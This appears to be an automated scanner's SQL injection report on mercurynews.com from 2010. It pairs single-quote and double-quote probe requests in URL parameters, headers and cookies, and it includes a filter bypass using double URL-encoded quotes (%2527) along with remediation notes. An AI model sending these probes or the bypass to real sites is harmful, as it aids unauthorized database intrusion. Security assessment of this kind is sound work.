GET /college-sports/ci_16793781?source=rss%2527 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='But Auburn quarterback Cam Newton is considered the overwhelming favorite'><meta name="keyw ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16793781?source=rss%2527%2527 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/college-sports/ci_16 ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI'; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI''; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]...
The __g_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __g_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310%2527; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310%2527%2527; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]...
The __qca cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __qca cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669';
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669'';
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]...
The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the currBrandCheck cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews'; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews''; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]...
The Zvents cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Zvents cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /columns/ci_16799883 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4'; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Today: Google will roll out Chrome OS notebooks next year, but you can apply for a public t ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /columns/ci_16799883 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4''; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/columns/ci_16799883?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:45:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:45:25 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 442
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /crime-courts/ci_16792429?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Prosecutors were barred from charging the Rev. Jerome Lindner with child molestation, even ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /crime-courts/ci_16792429?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/crime-courts/ci_1679 ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /crime-courts/ci_16792429?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI'; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Prosecutors were barred from charging the Rev. Jerome Lindner with child molestation, even ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /crime-courts/ci_16792429?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI''; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/crime-courts/ci_1679 ...[SNIP]...
The __g_c cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_c cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __g_c cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
